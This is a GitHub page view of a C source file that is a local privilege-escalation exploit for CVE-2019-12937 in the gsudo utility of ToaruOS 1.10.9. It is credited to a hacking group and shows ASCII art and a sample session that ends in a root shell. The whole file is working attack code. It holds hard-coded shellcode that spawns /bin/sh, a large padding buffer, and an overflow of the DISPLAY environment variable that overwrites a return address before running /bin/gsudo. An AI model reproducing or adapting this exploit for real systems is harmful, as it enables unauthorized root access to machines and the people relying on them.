Permalink
Cannot retrieve contributors at this time
Name already in use
A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
kowasuos/exploits/kowasu-gsudo.c
Go to fileThis commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
77 lines (70 sloc)
2.34 KB
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| * The Mickey Mouse Hacking Squadron proudly presents | |
| * | |
| * CVE-2019-12937 | |
| * | |
| * ToaruOS 1.10.9 gsudo local root exploit | |
| * | |
| * .-"""-. | |
| * / . - \ | |
| * \ / | |
| * .-""-.,:.-_-.< | |
| * / _; , / ).| | |
| * \ ; / ` `" '\ | |
| * '.-| ;-.____, | ., | |
| * \ `._~_/ / /"/ | |
| * ,. /`-.__.-'\`-._ ,",' ; | |
| * \"\ / /| o \._ `-._; / ./-. | |
| * ; ';, / / | `__ \ `-.,( / //.-' | |
| * :\ \\;_.-" ; |.-"` ``\ /-. /.-' | |
| * :\ .\),.-' / }{ | '..' | |
| * \ .-\ | , / | |
| * '..' ;' , / | |
| * ( __ `;--;'__`) | |
| * `//'` `||` | |
| * _// || | |
| * .-"-._,(__) .(__).-""-. | |
| * / \ / \ | |
| * \ / \ / | |
| * `'--=="--` `--""==--'` | |
| * | |
| * local@livecd ~$ gcc kowasu-gsudo.c -o kowasu-gsudo | |
| * local@livecd ~$ whoami | |
| * local | |
| * local@livecd ~$ ./kowasu-gsudo | |
| * 0@livecd /home/local# whoami | |
| * root | |
| */ | |
| #include <stdio.h> | |
| #include <stdlib.h> | |
| #include <string.h> | |
| #include <unistd.h> | |
| #define EIP "\xb0\xb0\x01\x3f" | |
| #define EIP_DISTANCE 26U | |
| char shellcode[] = { | |
| 0x31, 0xc0, 0x04, 0x18, 0x31, 0xdb, 0xcd, 0x7f, 0xeb, 0x1a, 0x5b, 0x31, | |
| 0xc0, 0x88, 0x43, 0x07, 0x89, 0x5b, 0x08, 0x89, 0x43, 0x0c, 0x04, 0x07, | |
| 0x8d, 0x4b, 0x08, 0x8d, 0x53, 0x0c, 0xcd, 0x7f, 0x31, 0xc0, 0xcd, 0x7f, | |
| 0xe8, 0xe1, 0xff, 0xff, 0xff, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x73, 0x68, | |
| 0x68, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x58, 0x00 | |
| }; | |
| unsigned int shellcode_length = 57; | |
| int main(void) | |
| { | |
| /* Payload is large, because the arguments and environment start around | |
| * 0x3f00XXXX and we need to pivot the address to remove the 0 byte. | |
| * We do this by including a 64k nop sled in the payload. | |
| */ | |
| char payload[65536]; | |
| char vector[8192] = "DISPLAY=AAA"; | |
| char * const arg[3] = { "/bin/gsudo", "meh", NULL }; | |
| char * const env[3] = { payload, vector, NULL }; | |
| memset(payload, 'A', sizeof(payload) - shellcode_length - 1); | |
| payload[sizeof(payload) - shellcode_length - 1] = 0; | |
| strcat(payload, shellcode); | |
| for (unsigned int i = 0; i < EIP_DISTANCE; i++) | |
| strcat(vector, EIP); | |
| execve("/bin/gsudo", arg, env); | |
| perror("execve()"); | |
| exit(EXIT_FAILURE); | |
| } |